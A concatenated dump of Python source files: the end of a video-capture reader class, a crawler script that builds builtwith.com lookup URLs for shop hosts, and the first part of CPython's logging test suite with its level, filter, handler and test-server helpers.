        # Releasing the capture makes read() fail, which lets the reader
        # thread exit its loop.
        self.capture.release()

    def get_frame(self):
        """Return a copy of the latest frame, or None if unavailable."""
        if not self.capture.isOpened() or self.frame is None:
            return None
        return self.frame.copy()
|
main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
ALL_OF_MY_CATEGORYS = read_file('category.txt')
HOW_MANY_CATEGORYS_I_READ = []

def _extract_host(raw):
    """Reduce a raw shop entry (possibly a full URL) to its bare host.

    Mirrors the original branch logic: strip an ``http(s)://`` scheme or
    jump to a leading ``www``, then drop everything from the first ``/``.
    Entries with neither a scheme nor ``www`` are returned unchanged,
    path and all (that was the original behaviour too).
    """
    for scheme in ('https://', 'http://'):
        pos = raw.find(scheme)
        if pos > -1:
            host = raw[pos + len(scheme):]
            slash = host.find('/')
            return host[:slash] if slash > -1 else host
    pos = raw.find('www')
    if pos > -1:
        host = raw[pos:]
        slash = host.find('/')
        return host[:slash] if slash > -1 else host
    return raw

for i in ALL_OF_MY_CATEGORYS:
    category = i.split('\n')[0]  # strip the trailing newline once
    shop_names = shops_name_in_there(category)
    PROJECT_NAME = category
    HOMEPAGE = []
    # Build one builtwith.com lookup URL per shop in this category.
    # NOTE(review): the shop count is now taken once per category; the
    # original re-queried how_many_shop_is_there() on every loop pass.
    for j in range(how_many_shop_is_there(category)):
        shop_name = _extract_host(shop_names.iloc[j]['Shops'])
        HOMEPAGE.append('https://builtwith.com/{}'.format(shop_name))
    DOMAIN_NAME = get_domain_name('https://builtwith.com')
    QUEUE_FILE = PROJECT_NAME + '/queue.txt'
    CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
    NUMBER_OF_THREADS = 8
    queue = Queue()
    Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# # Create worker threads (will die when main exits)
# def create_workers():
# for _ in range(NUMBER_OF_THREADS):
# t = threading.Thread(target=work)
# t.daemon = True
# t.start()
# # Do the next job in the queue
# def work():
# while True:
# url = queue.get()
# Spider.crawl_page(threading.current_thread().name, url)
# queue.task_done()
# # Each queued link is a new job
# def create_jobs():
# for categoty in ALL_OF_MY_CATEGORYS:
# HOW_MANY_CATEGORYS_I_READ.append(categoty)
# crawl()
# # Check if there are items in the queue, if so crawl them
# def crawl():
# if len(ALL_OF_MY_CATEGORYS)>0:
# print('how many categotys left = ' + str(ALL_OF_MY_CATEGORYS))
# create_jobs()
# create_workers()
# crawl()
|
test_logging.py | # Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
    """Base class for logging tests."""
    # Default format/pattern used by assert_log_lines(); subclasses override
    # expected_log_pat when their format differs.
    log_format = "%(name)s -> %(levelname)s: %(message)s"
    expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
    # Auto-incrementing counter behind next_message().
    message_num = 0
    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        self._threading_key = support.threading_setup()
        logger_dict = logging.getLogger().manager.loggerDict
        # Snapshot all module-global logging state under the module lock so
        # that tearDown() can restore it exactly, whatever the test did.
        logging._acquireLock()
        try:
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = saved_loggers = logger_dict.copy()
            self.saved_name_to_level = logging._nameToLevel.copy()
            self.saved_level_to_name = logging._levelToName.copy()
            self.logger_states = logger_states = {}
            for name in saved_loggers:
                logger_states[name] = getattr(saved_loggers[name],
                                              'disabled', None)
        finally:
            logging._releaseLock()
        # Set two unused loggers
        self.logger1 = logging.getLogger("\xab\xd7\xbb")
        self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()
        # All test output is captured in a StringIO via a handler on root.
        self.stream = io.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        # A handler left over from a previous test would corrupt the capture,
        # so fail loudly if either canary logger already sees one.
        if self.logger1.hasHandlers():
            hlist = self.logger1.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        if self.logger2.hasHandlers():
            hlist = self.logger2.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        self.root_logger.addHandler(self.root_hdlr)
        self.assertTrue(self.logger1.hasHandlers())
        self.assertTrue(self.logger2.hasHandlers())
    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        while self.root_logger.handlers:
            h = self.root_logger.handlers[0]
            self.root_logger.removeHandler(h)
            h.close()
        self.root_logger.setLevel(self.original_logging_level)
        # Restore the global logging state captured in setUp(), again under
        # the module lock.
        logging._acquireLock()
        try:
            logging._levelToName.clear()
            logging._levelToName.update(self.saved_level_to_name)
            logging._nameToLevel.clear()
            logging._nameToLevel.update(self.saved_name_to_level)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            manager = logging.getLogger().manager
            manager.disable = 0
            loggerDict = manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
            logger_states = self.logger_states
            for name in self.logger_states:
                if logger_states[name] is not None:
                    self.saved_loggers[name].disabled = logger_states[name]
        finally:
            logging._releaseLock()
        self.doCleanups()
        support.threading_cleanup(*self._threading_key)
    def assert_log_lines(self, expected_values, stream=None, pat=None):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream or self.stream
        pat = re.compile(pat or self.expected_log_pat)
        actual_lines = stream.getvalue().splitlines()
        self.assertEqual(len(actual_lines), len(expected_values))
        for actual, expected in zip(actual_lines, expected_values):
            match = pat.search(actual)
            if not match:
                self.fail("Log line does not match expected pattern:\n" +
                            actual)
            self.assertEqual(tuple(match.groups()), expected)
        # Nothing should remain unread on the stream after the comparison.
        s = stream.read()
        if s:
            self.fail("Remaining output at end of log stream:\n" + s)
    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
    """Test builtin levels and their inheritance."""
    def test_flat(self):
        # Logging levels in a flat logger namespace.
        m = self.next_message
        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        # INF is wrapped in a LoggerAdapter to check that adapters honour
        # levels exactly like plain loggers do.
        INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)
        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())
        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warning(m())
        INF.info(m())
        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warning(m())
        DEB.info(m())
        DEB.debug(m())
        # These should not log.
        # (They still consume message numbers 12-15, which therefore never
        # appear in the expected output below.)
        ERR.warning(m())
        ERR.info(m())
        ERR.debug(m())
        INF.debug(m())
        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])
    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message
        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())
        # These should not log.
        INF_ERR.warning(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())
        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])
    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        m = self.next_message
        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        # The *.UNDEF loggers set no level of their own, so they inherit the
        # effective level of their nearest configured ancestor.
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")
        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warning(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())
        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warning(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())
        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])
    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        # Note the grandchild is created *before* its parent logger.
        m = self.next_message
        INF = logging.getLogger("INF")
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)
        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())
        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())
        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])
    def test_regression_22386(self):
        """See issue #22386 for more information."""
        # getLevelName is its own inverse for registered levels.
        self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
        self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
    def test_issue27935(self):
        # 'FATAL' resolves to the same value as CRITICAL/FATAL.
        fatal = logging.getLevelName('FATAL')
        self.assertEqual(fatal, logging.FATAL)
    def test_regression_29220(self):
        """See issue #29220 for more information."""
        # Registering an empty name for a level must not break lookups.
        logging.addLevelName(logging.INFO, '')
        self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
        self.assertEqual(logging.getLevelName(logging.INFO), '')
        self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
        self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
    """Test the bundled Filter class."""
    def test_filter(self):
        # Only records whose logger name falls under "spam.eggs" survive
        # a name-based Filter installed on the root handler.
        name_filter = logging.Filter("spam.eggs")
        root_handler = self.root_logger.handlers[0]
        try:
            root_handler.addFilter(name_filter)
            for logger_name in ("spam", "spam.eggs", "spam.eggs.fish",
                                "spam.bakedbeans"):
                logging.getLogger(logger_name).info(self.next_message())
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            root_handler.removeFilter(name_filter)
    def test_callable_filter(self):
        # A plain callable works as a filter as well as a Filter instance.
        def filterfunc(record):
            # Keep records whose first two dotted name parts are spam.eggs.
            return '.'.join(record.name.split('.')[:2]) == 'spam.eggs'
        root_handler = self.root_logger.handlers[0]
        try:
            root_handler.addFilter(filterfunc)
            for logger_name in ("spam", "spam.eggs", "spam.eggs.fish",
                                "spam.bakedbeans"):
                logging.getLogger(logger_name).info(self.next_message())
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            root_handler.removeFilter(filterfunc)
    def test_empty_filter(self):
        # A Filter constructed with no name passes every record.
        empty = logging.Filter()
        record = logging.makeLogRecord({'name': 'spam.eggs'})
        self.assertTrue(empty.filter(record))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
# Every custom level, BORING (111) through SILENT (120) inclusive.
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT      : 'Silent',
    TACITURN    : 'Taciturn',
    TERSE       : 'Terse',
    EFFUSIVE    : 'Effusive',
    SOCIABLE    : 'Sociable',
    VERBOSE     : 'Verbose',
    TALKATIVE   : 'Talkative',
    GARRULOUS   : 'Garrulous',
    CHATTERBOX  : 'Chatterbox',
    BORING      : 'Boring',
}
class GarrulousFilter(logging.Filter):
    """A filter which blocks garrulous messages."""
    def filter(self, record):
        # Drop exactly the GARRULOUS level; everything else passes.
        blocked = (record.levelno == GARRULOUS)
        return not blocked
class VerySpecificFilter(logging.Filter):
    """A filter which blocks sociable and taciturn messages."""
    def filter(self, record):
        # Block the two specific levels; let everything else through.
        return record.levelno != SOCIABLE and record.levelno != TACITURN
class CustomLevelsAndFiltersTest(BaseTest):
    """Test various filtering possibilities with custom logging levels."""
    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
    def setUp(self):
        BaseTest.setUp(self)
        # Register human-readable names for all the custom levels; BaseTest
        # restores the original name tables in tearDown().
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)
    def log_at_all_levels(self, logger):
        # Emit one numbered message at every custom level, BORING..SILENT.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())
    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])
    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            # Reset the handler level so later tests see an open handler.
            self.root_logger.handlers[0].setLevel(logging.NOTSET)
    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)
            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            # Remove both filters so the shared root handler is left clean.
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class HandlerTest(BaseTest):
    """Tests for logging.Handler and the concrete handlers in
    logging.handlers."""
    def test_name(self):
        # The name property is settable/readable; emit() is abstract.
        h = logging.Handler()
        h.name = 'generic'
        self.assertEqual(h.name, 'generic')
        h.name = 'anothergeneric'
        self.assertEqual(h.name, 'anothergeneric')
        self.assertRaises(NotImplementedError, h.emit, None)
    def test_builtin_handlers(self):
        # We can't actually *use* too many handlers in the tests,
        # but we can try instantiating them with various options
        # WatchedFileHandler and SysLogHandler paths are POSIX-only.
        if sys.platform in ('linux', 'darwin'):
            for existing in (True, False):
                fd, fn = tempfile.mkstemp()
                os.close(fd)
                if not existing:
                    os.unlink(fn)
                h = logging.handlers.WatchedFileHandler(fn, delay=True)
                if existing:
                    # delay=True means the file is not opened yet, so the
                    # cached (dev, ino) sentinel values are still -1.
                    dev, ino = h.dev, h.ino
                    self.assertEqual(dev, -1)
                    self.assertEqual(ino, -1)
                    r = logging.makeLogRecord({'msg': 'Test'})
                    h.handle(r)
                    # Now remove the file.
                    os.unlink(fn)
                    self.assertFalse(os.path.exists(fn))
                    # The next call should recreate the file.
                    h.handle(r)
                    self.assertTrue(os.path.exists(fn))
                else:
                    self.assertEqual(h.dev, -1)
                    self.assertEqual(h.ino, -1)
                h.close()
                if existing:
                    os.unlink(fn)
            if sys.platform == 'darwin':
                sockname = '/var/run/syslog'
            else:
                sockname = '/dev/log'
            try:
                h = logging.handlers.SysLogHandler(sockname)
                self.assertEqual(h.facility, h.LOG_USER)
                self.assertTrue(h.unixsocket)
                h.close()
            except OSError: # syslogd might not be available
                pass
        # HTTPHandler only accepts GET and POST.
        for method in ('GET', 'POST', 'PUT'):
            if method == 'PUT':
                self.assertRaises(ValueError, logging.handlers.HTTPHandler,
                        'localhost', '/log', method)
            else:
                h = logging.handlers.HTTPHandler('localhost', '/log', method)
                h.close()
        # Capacity 0 means every record triggers a flush; capacity 1 does not
        # flush after zero records.
        h = logging.handlers.BufferingHandler(0)
        r = logging.makeLogRecord({})
        self.assertTrue(h.shouldFlush(r))
        h.close()
        h = logging.handlers.BufferingHandler(1)
        self.assertFalse(h.shouldFlush(r))
        h.close()
    def test_path_objects(self):
        """
        Test that Path objects are accepted as filename arguments to handlers.
        See Issue #27493.
        """
        fd, fn = tempfile.mkstemp()
        os.close(fd)
        os.unlink(fn)
        pfn = pathlib.Path(fn)
        cases = (
                    (logging.FileHandler, (pfn, 'w')),
                    (logging.handlers.RotatingFileHandler, (pfn, 'a')),
                    (logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
                )
        if sys.platform in ('linux', 'darwin'):
            cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
        for cls, args in cases:
            h = cls(*args)
            self.assertTrue(os.path.exists(fn))
            h.close()
            os.unlink(fn)
    @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
    def test_race(self):
        # Issue #14632 refers.
        # A background thread repeatedly deletes the log file while the main
        # thread keeps handling records; WatchedFileHandler must recover.
        def remove_loop(fname, tries):
            for _ in range(tries):
                try:
                    os.unlink(fname)
                    self.deletion_time = time.time()
                except OSError:
                    pass
                time.sleep(0.004 * random.randint(0, 4))
        del_count = 500
        log_count = 500
        self.handle_time = None
        self.deletion_time = None
        for delay in (False, True):
            fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
            os.close(fd)
            remover = threading.Thread(target=remove_loop, args=(fn, del_count))
            remover.daemon = True
            remover.start()
            h = logging.handlers.WatchedFileHandler(fn, delay=delay)
            f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
            h.setFormatter(f)
            try:
                for _ in range(log_count):
                    time.sleep(0.005)
                    r = logging.makeLogRecord({'msg': 'testing' })
                    try:
                        self.handle_time = time.time()
                        h.handle(r)
                    except Exception:
                        print('Deleted at %s, '
                              'opened at %s' % (self.deletion_time,
                                                self.handle_time))
                        raise
            finally:
                remover.join()
                h.close()
                if os.path.exists(fn):
                    os.unlink(fn)
    # The implementation relies on os.register_at_fork existing, but we test
    # based on os.fork existing because that is what users and this test use.
    # This helps ensure that when fork exists (the important concept) that the
    # register_at_fork mechanism is also present and used.
    @unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
    def test_post_fork_child_no_deadlock(self):
        """Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
        class _OurHandler(logging.Handler):
            def __init__(self):
                super().__init__()
                self.sub_handler = logging.StreamHandler(
                    stream=open('/dev/null', 'wt'))
            def emit(self, record):
                self.sub_handler.acquire()
                try:
                    self.sub_handler.emit(record)
                finally:
                    self.sub_handler.release()
        self.assertEqual(len(logging._handlers), 0)
        refed_h = _OurHandler()
        self.addCleanup(refed_h.sub_handler.stream.close)
        # Naming the handler registers it in logging._handlers.
        refed_h.name = 'because we need at least one for this test'
        self.assertGreater(len(logging._handlers), 0)
        self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
        test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
        test_logger.addHandler(refed_h)
        test_logger.setLevel(logging.DEBUG)
        locks_held__ready_to_fork = threading.Event()
        fork_happened__release_locks_and_end_thread = threading.Event()
        def lock_holder_thread_fn():
            logging._acquireLock()
            try:
                refed_h.acquire()
                try:
                    # Tell the main thread to do the fork.
                    locks_held__ready_to_fork.set()
                    # If the deadlock bug exists, the fork will happen
                    # without dealing with the locks we hold, deadlocking
                    # the child.
                    # Wait for a successful fork or an unreasonable amount of
                    # time before releasing our locks. To avoid a timing based
                    # test we'd need communication from os.fork() as to when it
                    # has actually happened.  Given this is a regression test
                    # for a fixed issue, potentially less reliably detecting
                    # regression via timing is acceptable for simplicity.
                    # The test will always take at least this long. :(
                    fork_happened__release_locks_and_end_thread.wait(0.5)
                finally:
                    refed_h.release()
            finally:
                logging._releaseLock()
        lock_holder_thread = threading.Thread(
            target=lock_holder_thread_fn,
            name='test_post_fork_child_no_deadlock lock holder')
        lock_holder_thread.start()
        locks_held__ready_to_fork.wait()
        pid = os.fork()
        if pid == 0:  # Child.
            try:
                test_logger.info(r'Child process did not deadlock. \o/')
            finally:
                os._exit(0)
        else:  # Parent.
            test_logger.info(r'Parent process returned from fork. \o/')
            fork_happened__release_locks_and_end_thread.set()
            lock_holder_thread.join()
            start_time = time.monotonic()
            while True:
                test_logger.debug('Waiting for child process.')
                waited_pid, status = os.waitpid(pid, os.WNOHANG)
                if waited_pid == pid:
                    break  # child process exited.
                if time.monotonic() - start_time > 7:
                    break  # so long? implies child deadlock.
                time.sleep(0.05)
            test_logger.debug('Done waiting.')
            if waited_pid != pid:
                os.kill(pid, signal.SIGKILL)
                waited_pid, status = os.waitpid(pid, 0)
                self.fail("child process deadlocked.")
            self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
    """A write-only stream stand-in whose write() always fails, used to
    exercise handler error paths."""
    def write(self, data):
        # Simulate an unusable underlying stream.
        raise RuntimeError("deliberate mistake")
class TestStreamHandler(logging.StreamHandler):
    """StreamHandler that records, rather than reports, the record that
    triggered an emit error."""
    def handleError(self, record):
        # Stash the failing record so tests can inspect it afterwards.
        self.error_record = record
class StreamWithIntName(object):
    # Minimal stream-like object whose name is an int, used to check that
    # StreamHandler.__repr__ copes with non-string stream names.
    level = logging.NOTSET
    name = 2
class StreamHandlerTest(BaseTest):
    """Tests for logging.StreamHandler behaviour."""
    def test_error_handling(self):
        # A stream whose write() raises should be routed to handleError().
        h = TestStreamHandler(BadStream())
        r = logging.makeLogRecord({})
        old_raise = logging.raiseExceptions
        try:
            h.handle(r)
            self.assertIs(h.error_record, r)
            # With the default handleError and raiseExceptions True, the
            # traceback is printed to stderr.
            h = logging.StreamHandler(BadStream())
            with support.captured_stderr() as stderr:
                h.handle(r)
                msg = '\nRuntimeError: deliberate mistake\n'
                self.assertIn(msg, stderr.getvalue())
            # With raiseExceptions off, handler errors are swallowed silently.
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                h.handle(r)
                self.assertEqual('', stderr.getvalue())
        finally:
            # Restore the module-global flag for subsequent tests.
            logging.raiseExceptions = old_raise
    def test_stream_setting(self):
        """
        Test setting the handler's stream
        """
        h = logging.StreamHandler()
        stream = io.StringIO()
        # setStream returns the previously-set stream...
        old = h.setStream(stream)
        self.assertIs(old, sys.stderr)
        actual = h.setStream(old)
        self.assertIs(actual, stream)
        # test that setting to existing value returns None
        actual = h.setStream(old)
        self.assertIsNone(actual)
    def test_can_represent_stream_with_int_name(self):
        # repr() must not assume the stream name is a string.
        h = logging.StreamHandler(StreamWithIntName())
        self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
    """
    This class implements a test SMTP server.
    :param addr: A (host, port) tuple which the server listens on.
                 You can specify a port value of zero: the server's
                 *port* attribute will hold the actual port number
                 used, which can be used in client connections.
    :param handler: A callable which will be called to process
                    incoming messages. The handler will be passed
                    the client address tuple, who the message is from,
                    a list of recipients and the message data.
    :param poll_interval: The interval, in seconds, used in the underlying
                          :func:`select` or :func:`poll` call by
                          :func:`asyncore.loop`.
    :param sockmap: A dictionary which will be used to hold
                    :class:`asyncore.dispatcher` instances used by
                    :func:`asyncore.loop`. This avoids changing the
                    :mod:`asyncore` module's global state.
    """
    def __init__(self, addr, handler, poll_interval, sockmap):
        smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
                                  decode_data=True)
        # Port 0 makes the OS pick a free port; record the one actually
        # bound so clients can connect to it.
        self.port = self.socket.getsockname()[1]
        self._handler = handler
        self._thread = None
        self.poll_interval = poll_interval
    def process_message(self, peer, mailfrom, rcpttos, data):
        """
        Delegates to the handler passed in to the server's constructor.
        Typically, this will be a test case method.
        :param peer: The client (host, port) tuple.
        :param mailfrom: The address of the sender.
        :param rcpttos: The addresses of the recipients.
        :param data: The message.
        """
        self._handler(peer, mailfrom, rcpttos, data)
    def start(self):
        """
        Start the server running on a separate daemon thread.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        # Thread.setDaemon() is deprecated since 3.10 (removed in 3.13);
        # assign the daemon attribute directly instead.
        t.daemon = True
        t.start()
    def serve_forever(self, poll_interval):
        """
        Run the :mod:`asyncore` loop until normal termination
        conditions arise.
        :param poll_interval: The interval, in seconds, used in the underlying
                              :func:`select` or :func:`poll` call by
                              :func:`asyncore.loop`.
        """
        asyncore.loop(poll_interval, map=self._map)
    def stop(self):
        """
        Stop the thread by closing the server instance.
        Wait for the server thread to terminate.
        """
        self.close()
        support.join_thread(self._thread)
        self._thread = None
        # Drop any remaining dispatchers registered in our private map.
        asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
    """
    This mixin is used to start a server on a separate thread, and
    shut it down programmatically. Request handling is simplified - instead
    of needing to derive a suitable RequestHandler subclass, you just
    provide a callable which will be passed each received request to be
    processed.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request. This handler is called on the
                    server thread, effectively meaning that requests are
                    processed serially. While not quite Web scale ;-),
                    this should be fine for testing applications.
    :param poll_interval: The polling interval in seconds.
    """
    def __init__(self, handler, poll_interval):
        self._thread = None
        self.poll_interval = poll_interval
        self._handler = handler
        # Set once the server thread has entered its service loop.
        self.ready = threading.Event()
    def start(self):
        """
        Create a daemon thread to run the server, and start it.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        # Thread.setDaemon() is deprecated since 3.10 (removed in 3.13);
        # assign the daemon attribute directly instead.
        t.daemon = True
        t.start()
    def serve_forever(self, poll_interval):
        """
        Run the server. Set the ready flag before entering the
        service loop.
        """
        self.ready.set()
        super(ControlMixin, self).serve_forever(poll_interval)
    def stop(self):
        """
        Tell the server thread to stop, and wait for it to do so.
        """
        self.shutdown()
